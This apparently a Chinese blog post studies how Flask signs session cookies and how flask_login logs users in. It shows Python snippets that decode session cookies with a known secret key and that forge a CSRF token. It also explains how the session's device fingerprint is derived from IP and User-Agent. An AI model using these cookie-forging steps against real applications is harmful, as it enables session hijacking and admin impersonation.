flask的session解讀及flask_login登錄過程研究

 

 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from itsdangerous import URLSafeTimedSerializer
from flask.sessions import TaggedJSONSerializer
import hashlib
s=URLSafeTimedSerializer('some_random_key','cookie-session',serializer=TaggedJSONSerializer(),signer_kwargs={'key_derivation':'hmac','digest_method':hashlib.sha1})
result = s.loads('.eJytkkFv4jAQhf_KymcOxLSHReohUVg30noiUBLvuEIoCSmOY1OJQAmu-O91aFW19z1ZGr_3ed6M38jm2ZS9anoyf3ojv44fR0XmpBT3tjo_PJDr5LOSs8HgPzAJG14lNafkcfWasD8aaeHqSzQtmXHJY6QkzU_kur75vgHrWfEh_QEV4neQMKW2Nt-hLUzVRn1Ft3splrtS3P0fUDUrpn93o3p9XU_Ipt2S-adNxvWU6y6QejcDhxRdSNNMae4iAywPOC06sPkAMZ65Tc7goOVaGdDhkGboQNcUdH4GVhi0iwu62teV5QwHtHgBtwhQJ05afpeKlfW6FrPIooXWt2mlxgEcD0Ag5Y77HgrLM6-OO8rZksqY3_MsUjxejmFJ3R-eN8eXrtl_RQANejSj4xTFYpA66vxTOo3DAV2hUx9DarCoPdYZhWPc8DY70vbh1raedTycmgk59c3hi7sUq6NfwU03XuxL24wf42a4vgOsyrm7.DJDfoQ.lPf6Vla0QXeI1yOYs0riql1Lywk')
print '破解后：',result
破解后: {u'username': u'admin', u'csrf_token': '1b5037f10f247e0f8076145220db705b0baaaac5', u'user_id': u'1', u'_flashes': [('info', 'Please login to access this page.'), ('success', 'You have been logged in.')], u'_fresh': True, u'isAdmin': True, u'user': 'Admin', u'_id': 'c758c876c082eb509c0d1b6cf7de18daf4bd77a1d61b10ab0e32fec6dfc2efe7594c7aae02b4f96cc887ed2f1dc4d0ba58cc8cba97205abda3944e51c44b0727'}

1、username要和user_id保持對應

2、_id是采取的真實來源IP(X-Forwarded-For)和http請求頭中的User-Agent經過計算而來

 1、使用上面的方法解析flask的登錄過程

首次登錄某個頁面，跳轉到登錄驗證界面，返回cookie內容：.eJyrVopPy0kszkgtVrKKrlZSKIFQSUpWSonhprlJ5ba2SrU6UJFQ94qcyAi_HE_3irIoo5xST4-gMk93t6xIo7Cq5Eong0T3nCpPD6eMKKPQUqXaWCAEAJf8Hr4.DJI1lQ.hSLLzh_2xt_KwRnPRdox-OubPnY

解析：{u'_flashes': [('info', 'Please login to access this page.')]}

 瀏覽器根據返回的Location地址向服務器發出申請，帶上上次服務器返回的cookie值，服務器收到請求后返回響應內容，這次返回的cookie是：

.eJwtjk8LgjAcQL9K_M4ebNFF8CLm3MFBwVpbiKhoMmdB_pl_8LtX5OnBOzzeAkmp07YqWnDuC-y6PzJwIOXHJjOuC6u1GYZHLW5UEzwOEumehJeB4EAJdJ3zybNTrGcSepVErIc1XmML8vZdJt2rLp7gbJWIk33kRwepTkYqYlPEvnwYOouR-myKlFcLlRvKiRFNUAkeKHr-fawfC9Q4-A.DJI1lg.gTTZ5CnOXOokNA32I021cxkx_DA

解析：{u'csrf_token': '1b5037f10f247e0f8076145220db705b0baaaac5', u'_flashes': [('info', 'Please login to access this page.')]}

可以看到，比上一次多了個csrf_token信息，這個是用來登錄校驗使用的

 

 

 

token處理過程如下：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from itsdangerous import URLSafeTimedSerializer,base64_decode,base64_encode
from flask.sessions import TaggedJSONSerializer
import hashlib
s=URLSafeTimedSerializer('some_random_key','wtf-csrf-token')
token='IjY2NDg0MThjZDI3ZTMxOWNhZmExOGI1Y2E5OTI5NDYzOTM1YThkYjAi.DJO3Cw.D4WB4eYBUB6LOcZxY_tur12Ay0Q'
a = s.loads(token,max_age=3600)
print '破解:', a
print '*'*100
token ='6648418cd27e319cafa18b5ca9929463935a8db0'
token_jiami=s.dumps(token)
print '仿造token:  ',token_jiami


print '#'*100
base='127.0.0.1|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'
h=hashlib.sha512()
h.update(base.encode('utf8'))
print '設備指紋：',h.hexdigest()

 

session['_id'] = _create_identifier()：使用hashlib.sha512對客戶端的IP|User-agent進行hash，作為訪問者設備指紋